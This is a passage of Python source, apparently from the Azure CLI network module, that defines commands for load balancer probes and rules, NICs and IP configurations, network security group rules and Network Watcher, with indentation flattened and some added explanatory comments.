lb = lb_get(ncf.load_balancers, resource_group_name, load_balancer_name)
new_probe = Probe(
protocol=protocol, port=port, interval_in_seconds=interval, number_of_probes=threshold,
request_path=path, name=item_name)
upsert_to_collection(lb, 'probes', new_probe, 'name')
poller = ncf.load_balancers.begin_create_or_update(resource_group_name, load_balancer_name, lb)
return get_property(poller.result().probes, item_name)
def set_lb_probe(cmd, instance, parent, item_name, protocol=None, port=None,
path=None, interval=None, threshold=None):
with cmd.update_context(instance) as c:
c.set_param('protocol', protocol)
c.set_param('port', port)
c.set_param('request_path', path)
c.set_param('interval_in_seconds', interval)
c.set_param('number_of_probes', threshold)
return parent
def create_lb_rule(
cmd, resource_group_name, load_balancer_name, item_name,
protocol, frontend_port, backend_port, frontend_ip_name=None,
backend_address_pool_name=None, probe_name=None, load_distribution='default',
floating_ip=None, idle_timeout=None, enable_tcp_reset=None, disable_outbound_snat=None, backend_pools_name=None):
LoadBalancingRule = cmd.get_models('LoadBalancingRule')
ncf = network_client_factory(cmd.cli_ctx)
lb = cached_get(cmd, ncf.load_balancers.get, resource_group_name, load_balancer_name)
lb = lb_get_operation(lb)
if not frontend_ip_name:
frontend_ip_name = _get_default_name(lb, 'frontend_ip_configurations', '--frontend-ip-name')
    # avoid breaking when backend_address_pool_name is None and backend_pools_name is not None
if not backend_address_pool_name and backend_pools_name:
backend_address_pool_name = backend_pools_name[0]
if not backend_address_pool_name:
backend_address_pool_name = _get_default_name(lb, 'backend_address_pools', '--backend-pool-name')
new_rule = LoadBalancingRule(
name=item_name,
protocol=protocol,
frontend_port=frontend_port,
backend_port=backend_port,
frontend_ip_configuration=get_property(lb.frontend_ip_configurations,
frontend_ip_name),
backend_address_pool=get_property(lb.backend_address_pools,
backend_address_pool_name),
probe=get_property(lb.probes, probe_name) if probe_name else None,
load_distribution=load_distribution,
enable_floating_ip=floating_ip,
idle_timeout_in_minutes=idle_timeout,
enable_tcp_reset=enable_tcp_reset,
disable_outbound_snat=disable_outbound_snat)
if backend_pools_name:
new_rule.backend_address_pools = [get_property(lb.backend_address_pools, name) for name in backend_pools_name]
        # Otherwise the service responds with an error: (LoadBalancingRuleBackendAdressPoolAndBackendAddressPoolsCannotBeSetAtTheSameTimeWithDifferentValue) BackendAddressPool and BackendAddressPools[] in LoadBalancingRule rule2 cannot be set at the same time with different value.
new_rule.backend_address_pool = None
upsert_to_collection(lb, 'load_balancing_rules', new_rule, 'name')
poller = cached_put(cmd, ncf.load_balancers.begin_create_or_update, lb, resource_group_name, load_balancer_name)
return get_property(poller.result().load_balancing_rules, item_name)
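# Note: when --backend-pools-name is supplied, create_lb_rule populates the plural
# backend_address_pools list and clears the singular backend_address_pool, because the
# service rejects requests that set both fields to different values (see the error quoted
# in the comment above).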
def set_lb_rule(
cmd, instance, parent, item_name, protocol=None, frontend_port=None,
frontend_ip_name=None, backend_port=None, backend_address_pool_name=None, probe_name=None,
load_distribution='default', floating_ip=None, idle_timeout=None, enable_tcp_reset=None,
disable_outbound_snat=None, backend_pools_name=None):
with cmd.update_context(instance) as c:
c.set_param('protocol', protocol)
c.set_param('frontend_port', frontend_port)
c.set_param('backend_port', backend_port)
c.set_param('idle_timeout_in_minutes', idle_timeout)
c.set_param('load_distribution', load_distribution)
c.set_param('disable_outbound_snat', disable_outbound_snat)
c.set_param('enable_tcp_reset', enable_tcp_reset)
c.set_param('enable_floating_ip', floating_ip)
if frontend_ip_name is not None:
instance.frontend_ip_configuration = \
get_property(parent.frontend_ip_configurations, frontend_ip_name)
if backend_address_pool_name is not None:
instance.backend_address_pool = \
get_property(parent.backend_address_pools, backend_address_pool_name)
        # To keep compatibility when bumping the API version from '2020-11-01' to '2021-02-01'
# https://github.com/Azure/azure-rest-api-specs/issues/14430
if cmd.supported_api_version(min_api='2021-02-01') and not backend_pools_name:
instance.backend_address_pools = [instance.backend_address_pool]
if backend_pools_name is not None:
instance.backend_address_pools = [get_property(parent.backend_address_pools, i) for i in backend_pools_name]
        # Otherwise the service responds with an error: (LoadBalancingRuleBackendAdressPoolAndBackendAddressPoolsCannotBeSetAtTheSameTimeWithDifferentValue) BackendAddressPool and BackendAddressPools[] in LoadBalancingRule rule2 cannot be set at the same time with different value.
instance.backend_address_pool = None
if probe_name == '':
instance.probe = None
elif probe_name is not None:
instance.probe = get_property(parent.probes, probe_name)
return parent
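# Roughly: on API versions >= 2021-02-01 the update keeps backend_address_pools in sync with
# the singular backend_address_pool for compatibility (see the linked REST API spec issue),
# and when --backend-pools-name is used the singular field is cleared so the two properties
# never disagree.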
def add_lb_backend_address_pool_tunnel_interface(cmd, resource_group_name, load_balancer_name,
backend_address_pool_name, protocol, identifier, traffic_type, port=None):
client = network_client_factory(cmd.cli_ctx).load_balancer_backend_address_pools
address_pool = client.get(resource_group_name, load_balancer_name, backend_address_pool_name)
GatewayLoadBalancerTunnelInterface = cmd.get_models('GatewayLoadBalancerTunnelInterface')
tunnel_interface = GatewayLoadBalancerTunnelInterface(port=port, identifier=identifier, protocol=protocol, type=traffic_type)
if not address_pool.tunnel_interfaces:
address_pool.tunnel_interfaces = []
address_pool.tunnel_interfaces.append(tunnel_interface)
return client.begin_create_or_update(resource_group_name, load_balancer_name,
backend_address_pool_name, address_pool)
def update_lb_backend_address_pool_tunnel_interface(cmd, resource_group_name, load_balancer_name,
backend_address_pool_name, index, protocol=None, identifier=None, traffic_type=None, port=None):
client = network_client_factory(cmd.cli_ctx).load_balancer_backend_address_pools
address_pool = client.get(resource_group_name, load_balancer_name, backend_address_pool_name)
if index >= len(address_pool.tunnel_interfaces):
        raise UnrecognizedArgumentError(f'{index} is out of range, please provide a valid index')
item = address_pool.tunnel_interfaces[index]
if protocol:
item.protocol = protocol
if identifier:
item.identifier = identifier
if port:
item.port = port
if traffic_type:
item.type = traffic_type
return client.begin_create_or_update(resource_group_name, load_balancer_name,
backend_address_pool_name, address_pool)
def remove_lb_backend_address_pool_tunnel_interface(cmd, resource_group_name, load_balancer_name,
backend_address_pool_name, index):
client = network_client_factory(cmd.cli_ctx).load_balancer_backend_address_pools
address_pool = client.get(resource_group_name, load_balancer_name, backend_address_pool_name)
if index >= len(address_pool.tunnel_interfaces):
        raise UnrecognizedArgumentError(f'{index} is out of range, please provide a valid index')
address_pool.tunnel_interfaces.pop(index)
return client.begin_create_or_update(resource_group_name, load_balancer_name,
backend_address_pool_name, address_pool)
def list_lb_backend_address_pool_tunnel_interface(cmd, resource_group_name, load_balancer_name,
backend_address_pool_name):
client = network_client_factory(cmd.cli_ctx).load_balancer_backend_address_pools
address_pool = client.get(resource_group_name, load_balancer_name, backend_address_pool_name)
return address_pool.tunnel_interfaces
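# Note: gateway load balancer tunnel interfaces are addressed by their position in
# address_pool.tunnel_interfaces, so the update/remove helpers take an integer index rather
# than a name, and an out-of-range index is rejected before any request is sent.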
# endregion
# region LocalGateways
def _validate_bgp_peering(cmd, instance, asn, bgp_peering_address, peer_weight):
if any([asn, bgp_peering_address, peer_weight]):
if instance.bgp_settings is not None:
# update existing parameters selectively
if asn is not None:
instance.bgp_settings.asn = asn
if peer_weight is not None:
instance.bgp_settings.peer_weight = peer_weight
if bgp_peering_address is not None:
instance.bgp_settings.bgp_peering_address = bgp_peering_address
elif asn:
BgpSettings = cmd.get_models('BgpSettings')
            instance.bgp_settings = BgpSettings(asn=asn, bgp_peering_address=bgp_peering_address,
                                                peer_weight=peer_weight)
else:
raise CLIError(
'incorrect usage: --asn ASN [--peer-weight WEIGHT --bgp-peering-address IP]')
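# Roughly: if the gateway already has bgp_settings, only the parameters that were passed are
# overwritten; if it has none, --asn is mandatory and a fresh BgpSettings object is created
# from the supplied values.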
def create_local_gateway(cmd, resource_group_name, local_network_gateway_name, gateway_ip_address,
location=None, tags=None, local_address_prefix=None, asn=None,
bgp_peering_address=None, peer_weight=None, no_wait=False):
AddressSpace, LocalNetworkGateway, BgpSettings = cmd.get_models(
'AddressSpace', 'LocalNetworkGateway', 'BgpSettings')
client = network_client_factory(cmd.cli_ctx).local_network_gateways
local_gateway = LocalNetworkGateway(
local_network_address_space=AddressSpace(address_prefixes=(local_address_prefix or [])),
location=location, tags=tags, gateway_ip_address=gateway_ip_address)
if bgp_peering_address or asn or peer_weight:
local_gateway.bgp_settings = BgpSettings(asn=asn, bgp_peering_address=bgp_peering_address,
peer_weight=peer_weight)
return sdk_no_wait(no_wait, client.begin_create_or_update,
resource_group_name, local_network_gateway_name, local_gateway)
def update_local_gateway(cmd, instance, gateway_ip_address=None, local_address_prefix=None, asn=None,
bgp_peering_address=None, peer_weight=None, tags=None):
_validate_bgp_peering(cmd, instance, asn, bgp_peering_address, peer_weight)
if gateway_ip_address is not None:
instance.gateway_ip_address = gateway_ip_address
if local_address_prefix is not None:
instance.local_network_address_space.address_prefixes = local_address_prefix
if tags is not None:
instance.tags = tags
return instance
# endregion
# region NetworkInterfaces (NIC)
def create_nic(cmd, resource_group_name, network_interface_name, subnet, location=None, tags=None,
internal_dns_name_label=None, dns_servers=None, enable_ip_forwarding=False,
load_balancer_backend_address_pool_ids=None,
load_balancer_inbound_nat_rule_ids=None,
load_balancer_name=None, network_security_group=None,
private_ip_address=None, private_ip_address_version=None,
public_ip_address=None, virtual_network_name=None, enable_accelerated_networking=None,
application_security_groups=None, no_wait=False,
app_gateway_backend_address_pools=None, edge_zone=None):
client = network_client_factory(cmd.cli_ctx).network_interfaces
(NetworkInterface, NetworkInterfaceDnsSettings, NetworkInterfaceIPConfiguration, NetworkSecurityGroup,
PublicIPAddress, Subnet, SubResource) = cmd.get_models(
'NetworkInterface', 'NetworkInterfaceDnsSettings', 'NetworkInterfaceIPConfiguration',
'NetworkSecurityGroup', 'PublicIPAddress', 'Subnet', 'SubResource')
dns_settings = NetworkInterfaceDnsSettings(internal_dns_name_label=internal_dns_name_label,
dns_servers=dns_servers or [])
nic = NetworkInterface(location=location, tags=tags, enable_ip_forwarding=enable_ip_forwarding,
dns_settings=dns_settings)
if cmd.supported_api_version(min_api='2016-09-01'):
nic.enable_accelerated_networking = enable_accelerated_networking
if network_security_group:
nic.network_security_group = NetworkSecurityGroup(id=network_security_group)
ip_config_args = {
'name': 'ipconfig1',
'load_balancer_backend_address_pools': load_balancer_backend_address_pool_ids,
'load_balancer_inbound_nat_rules': load_balancer_inbound_nat_rule_ids,
'private_ip_allocation_method': 'Static' if private_ip_address else 'Dynamic',
'private_ip_address': private_ip_address,
'subnet': Subnet(id=subnet),
'application_gateway_backend_address_pools':
[SubResource(id=x) for x in app_gateway_backend_address_pools]
if app_gateway_backend_address_pools else None
}
if cmd.supported_api_version(min_api='2016-09-01'):
ip_config_args['private_ip_address_version'] = private_ip_address_version
if cmd.supported_api_version(min_api='2017-09-01'):
ip_config_args['application_security_groups'] = application_security_groups
ip_config = NetworkInterfaceIPConfiguration(**ip_config_args)
if public_ip_address:
ip_config.public_ip_address = PublicIPAddress(id=public_ip_address)
nic.ip_configurations = [ip_config]
if edge_zone:
nic.extended_location = _edge_zone_model(cmd, edge_zone)
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, network_interface_name, nic)
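# Illustrative summary: the NIC is always created with a single IP configuration named
# 'ipconfig1'; its allocation method is derived from whether --private-ip-address was given
# ('Static') or not ('Dynamic'), and newer fields (private IP version, application security
# groups) are only attached when supported_api_version says the API version allows them.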
def update_nic(cmd, instance, network_security_group=None, enable_ip_forwarding=None,
internal_dns_name_label=None, dns_servers=None, enable_accelerated_networking=None):
if enable_ip_forwarding is not None:
instance.enable_ip_forwarding = enable_ip_forwarding
if network_security_group == '':
instance.network_security_group = None
elif network_security_group is not None:
NetworkSecurityGroup = cmd.get_models('NetworkSecurityGroup')
instance.network_security_group = NetworkSecurityGroup(id=network_security_group)
if internal_dns_name_label == '':
instance.dns_settings.internal_dns_name_label = None
elif internal_dns_name_label is not None:
instance.dns_settings.internal_dns_name_label = internal_dns_name_label
if dns_servers == ['']:
instance.dns_settings.dns_servers = None
elif dns_servers:
instance.dns_settings.dns_servers = dns_servers
if enable_accelerated_networking is not None:
instance.enable_accelerated_networking = enable_accelerated_networking
return instance
def create_nic_ip_config(cmd, resource_group_name, network_interface_name, ip_config_name, subnet=None,
virtual_network_name=None, public_ip_address=None, load_balancer_name=None,
load_balancer_backend_address_pool_ids=None,
load_balancer_inbound_nat_rule_ids=None,
private_ip_address=None,
private_ip_address_version=None,
make_primary=False,
application_security_groups=None,
app_gateway_backend_address_pools=None):
NetworkInterfaceIPConfiguration, PublicIPAddress, Subnet, SubResource = cmd.get_models(
'NetworkInterfaceIPConfiguration', 'PublicIPAddress', 'Subnet', 'SubResource')
ncf = network_client_factory(cmd.cli_ctx)
nic = ncf.network_interfaces.get(resource_group_name, network_interface_name)
if cmd.supported_api_version(min_api='2016-09-01'):
IPVersion = cmd.get_models('IPVersion')
private_ip_address_version = private_ip_address_version or IPVersion.I_PV4.value
if private_ip_address_version == IPVersion.I_PV4.value and not subnet:
primary_config = next(x for x in nic.ip_configurations if x.primary)
subnet = primary_config.subnet.id
if make_primary:
for config in nic.ip_configurations:
config.primary = False
new_config_args = {
'name': ip_config_name,
'subnet': Subnet(id=subnet) if subnet else None,
'public_ip_address': PublicIPAddress(id=public_ip_address) if public_ip_address else None,
'load_balancer_backend_address_pools': load_balancer_backend_address_pool_ids,
'load_balancer_inbound_nat_rules': load_balancer_inbound_nat_rule_ids,
'private_ip_address': private_ip_address,
'private_ip_allocation_method': 'Static' if private_ip_address else 'Dynamic'
}
if cmd.supported_api_version(min_api='2016-09-01'):
new_config_args['private_ip_address_version'] = private_ip_address_version
new_config_args['primary'] = make_primary
if cmd.supported_api_version(min_api='2017-09-01'):
new_config_args['application_security_groups'] = application_security_groups
if cmd.supported_api_version(min_api='2018-08-01'):
new_config_args['application_gateway_backend_address_pools'] = \
[SubResource(id=x) for x in app_gateway_backend_address_pools] \
if app_gateway_backend_address_pools else None
new_config = NetworkInterfaceIPConfiguration(**new_config_args)
upsert_to_collection(nic, 'ip_configurations', new_config, 'name')
poller = ncf.network_interfaces.begin_create_or_update(
resource_group_name, network_interface_name, nic)
return get_property(poller.result().ip_configurations, ip_config_name)
def update_nic_ip_config_setter(cmd, resource_group_name, network_interface_name, parameters, gateway_lb):
aux_subscriptions = []
if is_valid_resource_id(gateway_lb):
aux_subscriptions.append(parse_resource_id(gateway_lb)['subscription'])
client = network_client_factory(cmd.cli_ctx, aux_subscriptions=aux_subscriptions).network_interfaces
return client.begin_create_or_update(resource_group_name, network_interface_name, parameters)
def set_nic_ip_config(cmd, instance, parent, ip_config_name, subnet=None,
virtual_network_name=None, public_ip_address=None, load_balancer_name=None,
load_balancer_backend_address_pool_ids=None,
load_balancer_inbound_nat_rule_ids=None,
private_ip_address=None,
private_ip_address_version=None, make_primary=False,
application_security_groups=None,
app_gateway_backend_address_pools=None, gateway_lb=None):
PublicIPAddress, Subnet, SubResource = cmd.get_models('PublicIPAddress', 'Subnet', 'SubResource')
if make_primary:
for config in parent.ip_configurations:
config.primary = False
instance.primary = True
if private_ip_address == '':
# switch private IP address allocation to Dynamic if empty string is used
instance.private_ip_address = None
instance.private_ip_allocation_method = 'dynamic'
if cmd.supported_api_version(min_api='2016-09-01'):
instance.private_ip_address_version = 'ipv4'
elif private_ip_address is not None:
# if specific address provided, allocation is static
instance.private_ip_address = private_ip_address
instance.private_ip_allocation_method = 'static'
if private_ip_address_version is not None:
instance.private_ip_address_version = private_ip_address_version
if subnet == '':
instance.subnet = None
elif subnet is not None:
instance.subnet = Subnet(id=subnet)
if public_ip_address == '':
instance.public_ip_address = None
elif public_ip_address is not None:
instance.public_ip_address = PublicIPAddress(id=public_ip_address)
if load_balancer_backend_address_pool_ids == '':
instance.load_balancer_backend_address_pools = None
elif load_balancer_backend_address_pool_ids is not None:
instance.load_balancer_backend_address_pools = load_balancer_backend_address_pool_ids
if load_balancer_inbound_nat_rule_ids == '':
instance.load_balancer_inbound_nat_rules = None
elif load_balancer_inbound_nat_rule_ids is not None:
instance.load_balancer_inbound_nat_rules = load_balancer_inbound_nat_rule_ids
if application_security_groups == ['']:
instance.application_security_groups = None
elif application_security_groups:
instance.application_security_groups = application_security_groups
if app_gateway_backend_address_pools == ['']:
instance.application_gateway_backend_address_pools = None
elif app_gateway_backend_address_pools:
instance.application_gateway_backend_address_pools = \
[SubResource(id=x) for x in app_gateway_backend_address_pools]
if gateway_lb is not None:
instance.gateway_load_balancer = None if gateway_lb == '' else SubResource(id=gateway_lb)
return parent
def _get_nic_ip_config(nic, name):
if nic.ip_configurations:
ip_config = next(
(x for x in nic.ip_configurations if x.name.lower() == name.lower()), None)
else:
ip_config = None
if not ip_config:
raise CLIError('IP configuration {} not found.'.format(name))
return ip_config
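# Note: IP configuration lookup is case-insensitive on the name and raises a CLIError when
# nothing matches, so the add/remove helpers below can assume a valid ip_config.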
def add_nic_ip_config_address_pool(
cmd, resource_group_name, network_interface_name, ip_config_name, backend_address_pool,
load_balancer_name=None, application_gateway_name=None):
BackendAddressPool = cmd.get_models('BackendAddressPool')
client = network_client_factory(cmd.cli_ctx).network_interfaces
nic = client.get(resource_group_name, network_interface_name)
ip_config = _get_nic_ip_config(nic, ip_config_name)
if load_balancer_name:
upsert_to_collection(ip_config, 'load_balancer_backend_address_pools',
BackendAddressPool(id=backend_address_pool),
'id')
elif application_gateway_name:
upsert_to_collection(ip_config, 'application_gateway_backend_address_pools',
BackendAddressPool(id=backend_address_pool),
'id')
poller = client.begin_create_or_update(resource_group_name, network_interface_name, nic)
return get_property(poller.result().ip_configurations, ip_config_name)
def remove_nic_ip_config_address_pool(
cmd, resource_group_name, network_interface_name, ip_config_name, backend_address_pool,
load_balancer_name=None, application_gateway_name=None):
client = network_client_factory(cmd.cli_ctx).network_interfaces
nic = client.get(resource_group_name, network_interface_name)
ip_config = _get_nic_ip_config(nic, ip_config_name)
if load_balancer_name:
keep_items = [x for x in ip_config.load_balancer_backend_address_pools or [] if x.id != backend_address_pool]
ip_config.load_balancer_backend_address_pools = keep_items
elif application_gateway_name:
keep_items = [x for x in ip_config.application_gateway_backend_address_pools or [] if
x.id != backend_address_pool]
ip_config.application_gateway_backend_address_pools = keep_items
poller = client.begin_create_or_update(resource_group_name, network_interface_name, nic)
return get_property(poller.result().ip_configurations, ip_config_name)
def add_nic_ip_config_inbound_nat_rule(
cmd, resource_group_name, network_interface_name, ip_config_name, inbound_nat_rule,
load_balancer_name=None):
InboundNatRule = cmd.get_models('InboundNatRule')
client = network_client_factory(cmd.cli_ctx).network_interfaces
nic = client.get(resource_group_name, network_interface_name)
ip_config = _get_nic_ip_config(nic, ip_config_name)
upsert_to_collection(ip_config, 'load_balancer_inbound_nat_rules',
InboundNatRule(id=inbound_nat_rule),
'id')
poller = client.begin_create_or_update(resource_group_name, network_interface_name, nic)
return get_property(poller.result().ip_configurations, ip_config_name)
def remove_nic_ip_config_inbound_nat_rule(
cmd, resource_group_name, network_interface_name, ip_config_name, inbound_nat_rule,
load_balancer_name=None):
client = network_client_factory(cmd.cli_ctx).network_interfaces
nic = client.get(resource_group_name, network_interface_name)
ip_config = _get_nic_ip_config(nic, ip_config_name)
keep_items = \
[x for x in ip_config.load_balancer_inbound_nat_rules or [] if x.id != inbound_nat_rule]
ip_config.load_balancer_inbound_nat_rules = keep_items
poller = client.begin_create_or_update(resource_group_name, network_interface_name, nic)
return get_property(poller.result().ip_configurations, ip_config_name)
# endregion
# region NetworkSecurityGroups
def create_nsg(cmd, resource_group_name, network_security_group_name, location=None, tags=None):
client = network_client_factory(cmd.cli_ctx).network_security_groups
NetworkSecurityGroup = cmd.get_models('NetworkSecurityGroup')
nsg = NetworkSecurityGroup(location=location, tags=tags)
return client.begin_create_or_update(resource_group_name, network_security_group_name, nsg)
def _create_singular_or_plural_property(kwargs, val, singular_name, plural_name):
if not val:
return
if not isinstance(val, list):
val = [val]
if len(val) > 1:
kwargs[plural_name] = val
kwargs[singular_name] = None
else:
kwargs[singular_name] = val[0]
kwargs[plural_name] = None
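# Example (illustrative values): for destination_port_ranges='80' this helper sets
# kwargs['destination_port_range'] = '80' and the plural key to None, while for
# ['80', '443'] it sets kwargs['destination_port_ranges'] = ['80', '443'] and the singular
# key to None -- mirroring how the SecurityRule model expects exactly one of the two fields
# to be populated.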
def _handle_asg_property(kwargs, key, asgs):
prefix = key.split('_', 1)[0] + '_'
if asgs:
kwargs[key] = asgs
if kwargs[prefix + 'address_prefix'].is_default:
kwargs[prefix + 'address_prefix'] = ''
def create_nsg_rule_2017_06_01(cmd, resource_group_name, network_security_group_name, security_rule_name,
priority, description=None, protocol=None, access=None, direction=None,
source_port_ranges='*', source_address_prefixes='*',
destination_port_ranges=80, destination_address_prefixes='*',
source_asgs=None, destination_asgs=None):
kwargs = {
'protocol': protocol,
'direction': direction,
'description': description,
'priority': priority,
'access': access,
'name': security_rule_name
}
_create_singular_or_plural_property(kwargs, source_address_prefixes,
'source_address_prefix', 'source_address_prefixes')
_create_singular_or_plural_property(kwargs, destination_address_prefixes,
'destination_address_prefix', 'destination_address_prefixes')
_create_singular_or_plural_property(kwargs, source_port_ranges,
'source_port_range', 'source_port_ranges')
_create_singular_or_plural_property(kwargs, destination_port_ranges,
'destination_port_range', 'destination_port_ranges')
# workaround for issue https://github.com/Azure/azure-rest-api-specs/issues/1591
kwargs['source_address_prefix'] = kwargs['source_address_prefix'] or ''
kwargs['destination_address_prefix'] = kwargs['destination_address_prefix'] or ''
if cmd.supported_api_version(min_api='2017-09-01'):
_handle_asg_property(kwargs, 'source_application_security_groups', source_asgs)
_handle_asg_property(kwargs, 'destination_application_security_groups', destination_asgs)
SecurityRule = cmd.get_models('SecurityRule')
settings = SecurityRule(**kwargs)
ncf = network_client_factory(cmd.cli_ctx)
return ncf.security_rules.begin_create_or_update(
resource_group_name, network_security_group_name, security_rule_name, settings)
def create_nsg_rule_2017_03_01(cmd, resource_group_name, network_security_group_name, security_rule_name,
priority, description=None, protocol=None, access=None, direction=None,
source_port_range='*', source_address_prefix='*',
destination_port_range=80, destination_address_prefix='*'):
SecurityRule = cmd.get_models('SecurityRule')
settings = SecurityRule(protocol=protocol, source_address_prefix=source_address_prefix,
destination_address_prefix=destination_address_prefix, access=access,
direction=direction,
description=description, source_port_range=source_port_range,
destination_port_range=destination_port_range, priority=priority,
name=security_rule_name)
ncf = network_client_factory(cmd.cli_ctx)
return ncf.security_rules.begin_create_or_update(
resource_group_name, network_security_group_name, security_rule_name, settings)
def _update_singular_or_plural_property(instance, val, singular_name, plural_name):
if val is None:
return
if not isinstance(val, list):
val = [val]
if len(val) > 1:
setattr(instance, plural_name, val)
setattr(instance, singular_name, None)
else:
setattr(instance, plural_name, None)
setattr(instance, singular_name, val[0])
def update_nsg_rule_2017_06_01(instance, protocol=None, source_address_prefixes=None,
destination_address_prefixes=None, access=None, direction=None, description=None,
source_port_ranges=None, destination_port_ranges=None, priority=None,
source_asgs=None, destination_asgs=None):
# No client validation as server side returns pretty good errors
instance.protocol = protocol if protocol is not None else instance.protocol
instance.access = access if access is not None else instance.access
instance.direction = direction if direction is not None else instance.direction
instance.description = description if description is not None else instance.description
instance.priority = priority if priority is not None else instance.priority
_update_singular_or_plural_property(instance, source_address_prefixes,
'source_address_prefix', 'source_address_prefixes')
_update_singular_or_plural_property(instance, destination_address_prefixes,
'destination_address_prefix', 'destination_address_prefixes')
_update_singular_or_plural_property(instance, source_port_ranges,
'source_port_range', 'source_port_ranges')
_update_singular_or_plural_property(instance, destination_port_ranges,
'destination_port_range', 'destination_port_ranges')
# workaround for issue https://github.com/Azure/azure-rest-api-specs/issues/1591
instance.source_address_prefix = instance.source_address_prefix or ''
instance.destination_address_prefix = instance.destination_address_prefix or ''
if source_asgs == ['']:
instance.source_application_security_groups = None
elif source_asgs:
instance.source_application_security_groups = source_asgs
if destination_asgs == ['']:
instance.destination_application_security_groups = None
elif destination_asgs:
instance.destination_application_security_groups = destination_asgs
return instance
def update_nsg_rule_2017_03_01(instance, protocol=None, source_address_prefix=None,
destination_address_prefix=None, access=None, direction=None, description=None,
source_port_range=None, destination_port_range=None, priority=None):
# No client validation as server side returns pretty good errors
instance.protocol = protocol if protocol is not None else instance.protocol
instance.source_address_prefix = (source_address_prefix if source_address_prefix is not None
else instance.source_address_prefix)
instance.destination_address_prefix = destination_address_prefix \
if destination_address_prefix is not None else instance.destination_address_prefix
instance.access = access if access is not None else instance.access
instance.direction = direction if direction is not None else instance.direction
instance.description = description if description is not None else instance.description
instance.source_port_range = source_port_range \
if source_port_range is not None else instance.source_port_range
instance.destination_port_range = destination_port_range \
if destination_port_range is not None else instance.destination_port_range
instance.priority = priority if priority is not None else instance.priority
return instance
# endregion
# region NetworkProfiles
def list_network_profiles(cmd, resource_group_name=None):
client = network_client_factory(cmd.cli_ctx).network_profiles
if resource_group_name:
return client.list(resource_group_name)
return client.list_all()
# endregion
# region NetworkWatchers
def _create_network_watchers(cmd, client, resource_group_name, locations, tags):
if resource_group_name is None:
raise CLIError("usage error: '--resource-group' required when enabling new regions")
NetworkWatcher = cmd.get_models('NetworkWatcher')
for location in locations:
client.create_or_update(
resource_group_name, '{}-watcher'.format(location),
NetworkWatcher(location=location, tags=tags))
def _update_network_watchers(cmd, client, watchers, tags):
NetworkWatcher = cmd.get_models('NetworkWatcher')
for watcher in watchers:
id_parts = parse_resource_id(watcher.id)
watcher_rg = id_parts['resource_group']
watcher_name = id_parts['name']
watcher_tags = watcher.tags if tags is None else tags
client.create_or_update(
watcher_rg, watcher_name,
NetworkWatcher(location=watcher.location, tags=watcher_tags))
def _delete_network_watchers(cmd, client, watchers):
for watcher in watchers:
from azure.cli.core.commands import LongRunningOperation
id_parts = parse_resource_id(watcher.id)
watcher_rg = id_parts['resource_group']
watcher_name = id_parts['name']
logger.warning(
"Disabling Network Watcher for region '%s' by deleting resource '%s'",
watcher.location, watcher.id)
LongRunningOperation(cmd.cli_ctx)(client.begin_delete(watcher_rg, watcher_name))
def configure_network_watcher(cmd, client, locations, resource_group_name=None, enabled=None, tags=None):
watcher_list = list(client.list_all())
locations_list = [location.lower() for location in locations]
existing_watchers = [w for w in watcher_list if w.location in locations_list]
nonenabled_regions = list(set(locations) - set(watcher.location for watcher in existing_watchers))
if enabled is None:
if resource_group_name is not None:
logger.warning(
"Resource group '%s' is only used when enabling new regions and will be ignored.",
resource_group_name)
for location in nonenabled_regions:
logger.warning(
"Region '%s' is not enabled for Network Watcher and will be ignored.", location)
_update_network_watchers(cmd, client, existing_watchers, tags)
elif enabled:
_create_network_watchers(cmd, client, resource_group_name, nonenabled_regions, tags)
_update_network_watchers(cmd, client, existing_watchers, tags)
else:
if tags is not None:
raise CLIError("usage error: '--tags' cannot be used when disabling regions")
_delete_network_watchers(cmd, client, existing_watchers)
return client.list_all()
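# Roughly, configure_network_watcher has three modes: with --enabled omitted it only
# re-applies tags to watchers that already exist; with --enabled true it additionally creates
# '<location>-watcher' resources in the given resource group for regions that have none; and
# with --enabled false it deletes the existing watchers for those regions (and rejects --tags).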
def create_nw_connection_monitor(cmd,
client,
connection_monitor_name,
watcher_rg,
watcher_name,
resource_group_name=None,
location=None,
source_resource=None,
source_port=None,
dest_resource=None,
dest_port=None,
dest_address=None,
tags=None,
do_not_start=None,
monitoring_interval=None,
endpoint_source_name=None,
endpoint_source_resource_id=None,
endpoint_source_address=None,
endpoint_source_type=None,
endpoint_source_coverage_level=None,
endpoint_dest_name=None,
endpoint_dest_resource_id=None,
endpoint_dest_address=None,
endpoint_dest_type=None,
endpoint_dest_coverage_level=None,
test_config_name=None,
test_config_frequency=None,
test_config_protocol=None,
test_config_preferred_ip_version=None,
test_config_threshold_failed_percent=None,
test_config_threshold_round_trip_time=None,
test_config_tcp_disable_trace_route=None,
test_config_tcp_port=None,
test_config_tcp_port_behavior=None,
test_config_icmp_disable_trace_route=None,
test_config_http_port=None,
test_config_http_method=None,
test_config_http_path=None,
test_config_http_valid_status_codes=None,
test_config_http_prefer_https=None,
test_group_name=None,
test_group_disable=None,
output_type=None,
workspace_ids=None,
notes=None):
v1_required_parameter_set = [
source_resource, source_port,
dest_resource, dest_address, dest_port
]
v2_required_parameter_set = [
endpoint_source_name, endpoint_source_resource_id, endpoint_source_type, endpoint_source_coverage_level,
endpoint_dest_name, endpoint_dest_address, endpoint_dest_type, endpoint_dest_coverage_level,
test_config_name, test_config_protocol,
output_type, workspace_ids,
]
if any(v1_required_parameter_set): # V1 creation
connection_monitor = _create_nw_connection_monitor_v1(cmd,
connection_monitor_name,
watcher_rg,
watcher_name,
source_resource,
resource_group_name,
source_port,
location,
dest_resource,
dest_port,
dest_address,
tags,
do_not_start,
monitoring_interval)
from azure.cli.core.profiles._shared import AD_HOC_API_VERSIONS
client = get_mgmt_service_client(
cmd.cli_ctx,
ResourceType.MGMT_NETWORK,
api_version=AD_HOC_API_VERSIONS[ResourceType.MGMT_NETWORK]['nw_connection_monitor']
).connection_monitors
elif any(v2_required_parameter_set): # V2 creation
connection_monitor = _create_nw_connection_monitor_v2(cmd,
location,
tags,
endpoint_source_name,
endpoint_source_resource_id,
endpoint_source_address,
endpoint_source_type,
endpoint_source_coverage_level,
endpoint_dest_name,
endpoint_dest_resource_id,
endpoint_dest_address,
endpoint_dest_type,
endpoint_dest_coverage_level,
test_config_name,
test_config_frequency,
test_config_protocol,
test_config_preferred_ip_version,
test_config_threshold_failed_percent,
test_config_threshold_round_trip_time,
test_config_tcp_port,
test_config_tcp_port_behavior,
test_config_tcp_disable_trace_route,
test_config_icmp_disable_trace_route,
test_config_http_port,
test_config_http_method,
test_config_http_path,
test_config_http_valid_status_codes,
test_config_http_prefer_https,
test_group_name,
test_group_disable,
output_type,
workspace_ids,
notes)
else:
raise CLIError('Unknown operation')
